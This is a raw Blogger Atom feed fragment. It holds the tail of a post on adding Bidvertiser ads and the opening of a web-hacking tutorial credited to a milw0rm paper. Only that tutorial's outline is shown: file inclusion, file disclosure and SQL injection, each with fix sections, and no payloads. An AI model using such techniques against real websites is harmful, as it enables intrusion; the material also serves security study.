large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;5) Click on preview &lt;span style=&quot;font-size: large;&quot;&gt;and see the blogger&lt;span style=&quot;font-size: large;&quot;&gt;&#39;s hom&lt;span style=&quot;font-size: large;&quot;&gt;e page. if everything lookin&lt;span style=&quot;font-size: large;&quot;&gt;g fine then click save&lt;span style=&quot;font-size: large;&quot;&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;6&lt;span style=&quot;font-size: large;&quot;&gt;)&lt;span style=&quot;font-size: large;&quot;&gt; And now you are done. Just vi&lt;span style=&quot;font-size: large;&quot;&gt;sit your blogger and check out if it works or not.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;You Can Ask in feedBacks if any problem. &lt;span style=&quot;font-size: large;&quot;&gt;R&lt;/span&gt;egard&lt;span style=&quot;font-size: large;&quot;&gt;s&lt;span style=&quot;font-size: large;&quot;&gt;.&lt;/span&gt;&lt;/span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; &lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br style=&quot;-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: #242424; color: #000222; font-family: Arial, Georgia, serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 22.390625px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;&quot; /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br style=&quot;-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: #242424; color: #000222; font-family: Arial, Georgia, serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 22.390625px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;&quot; /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br style=&quot;-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: #242424; color: #000222; font-family: Arial, Georgia, serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 22.390625px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;&quot; /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br style=&quot;-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: #242424; color: #000222; font-family: Arial, Georgia, serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 22.390625px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;&quot; /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br style=&quot;-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: #242424; color: #000222; font-family: Arial, Georgia, serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 22.390625px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;&quot; /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br style=&quot;-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: #242424; color: #000222; font-family: Arial, Georgia, serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 22.390625px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;&quot; /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br style=&quot;-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: #242424; color: #000222; font-family: Arial, Georgia, serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 22.390625px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;&quot; /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br style=&quot;-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: #242424; color: #000222; font-family: Arial, Georgia, serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 22.390625px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;&quot; /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br style=&quot;-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: #242424; color: #000222; font-family: Arial, Georgia, serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 22.390625px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;&quot; /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br style=&quot;-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: #242424; color: #000222; font-family: Arial, Georgia, serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 22.390625px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;&quot; /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br style=&quot;-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: #242424; color: #000222; font-family: Arial, Georgia, serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 22.390625px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;&quot; /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br style=&quot;-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: #242424; color: #000222; font-family: Arial, Georgia, serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 22.390625px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;&quot; /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br style=&quot;-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: #242424; color: #000222; font-family: Arial, Georgia, serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 22.390625px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;&quot; /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br style=&quot;-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: #242424; color: #000222; font-family: Arial, Georgia, serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 22.390625px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;&quot; /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br style=&quot;-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: #242424; color: #000222; font-family: Arial, Georgia, serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 22.390625px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;&quot; /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.blackleets.net/feeds/3845772884239079196/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blackleets.net/2013/03/add-bidvertiser-ads-under-bloggers-post.html#comment-form' title='5 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3130564110394933894/posts/default/3845772884239079196'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3130564110394933894/posts/default/3845772884239079196'/><link rel='alternate' type='text/html' href='http://www.blackleets.net/2013/03/add-bidvertiser-ads-under-bloggers-post.html' title='Add bidvertiser ads under Blogger&#39;s post title (Blogspot)'/><author><name>Blackleets</name><uri>http://www.blogger.com/profile/16410994504914391957</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://3.bp.blogspot.com/-dftCJdDmq4Y/UU3RmxS0HMI/AAAAAAAAAHE/kdCiuRew9IE/s220/images.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-BzUyc7cc3jU/UVMbPe6CheI/AAAAAAAAAIg/lqkpEvto4dw/s72-c/Capture.PNG" height="72" width="72"/><thr:total>5</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3130564110394933894.post-8022099864926560800</id><published>2013-03-26T18:01:00.000+05:00</published><updated>2013-11-13T14:28:44.886+05:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="web application hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="web application penetration testing"/><category scheme="http://www.blogger.com/atom/ns#" term="web application security"/><title type='text'>Find 0day&#39;s vulnerabilities in web application</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-p9BYZVpIGnc/UVGddbrfCOI/AAAAAAAAAIQ/hIp91lqGZ7g/s1600/images.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;154&quot; src=&quot;http://2.bp.blogspot.com/-p9BYZVpIGnc/UVGddbrfCOI/AAAAAAAAAIQ/hIp91lqGZ7g/s320/images.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;background-color: yellow;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;This artcile is taken from milw0rm security team&#39;s paper,&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: magenta; font-size: large;&quot;&gt;&amp;nbsp;&lt;span style=&quot;color: red;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: magenta; font-size: large;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;Author : SirGod&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: magenta; font-size: large;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;i&gt;&lt;b&gt;Greetz goes &lt;span style=&quot;color: black;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;t&lt;/span&gt;&lt;/span&gt;o : SirGod&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt; &lt;br /&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;What we will cover in this lecture?&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;background-color: cyan;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;background-color: cyan;&quot;&gt;1) About&lt;/span&gt;&lt;br /&gt;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;background-color: cyan;&quot;&gt;2) Some stuff&lt;/span&gt;&lt;br /&gt;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;background-color: cyan;&quot;&gt;3) Remote File Inclusion&lt;/span&gt;&lt;br /&gt;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;background-color: cyan;&quot;&gt;3.0 – Basic example&lt;/span&gt;&lt;br /&gt;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: cyan;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;3.1 – Simple example&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: cyan;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;3.2 – How to fix&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: cyan;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;4) Local File Inclusion&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: cyan;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;4.0 – Basic example&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: cyan;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;4.1 – Simple example&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: cyan;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;4.2 – How to fix&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: cyan;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;5) Local File Disclosure/Download&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: cyan;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;background-color: cyan;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;i&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/i&gt;&lt;/span&gt;5.0 – Basic example&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: cyan;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;5.1 – Simple example&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: cyan;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;background-color: cyan;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;background-color: cyan;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;5.2 – How to fix&lt;br /&gt;&lt;span id=&quot;more-387&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: cyan;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;background-color: cyan;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;6) SQL Injection&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: cyan;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;6.0 – Basic example&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: cyan;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;6.1 – Simple example&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: cyan;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;6.2 – SQL Login 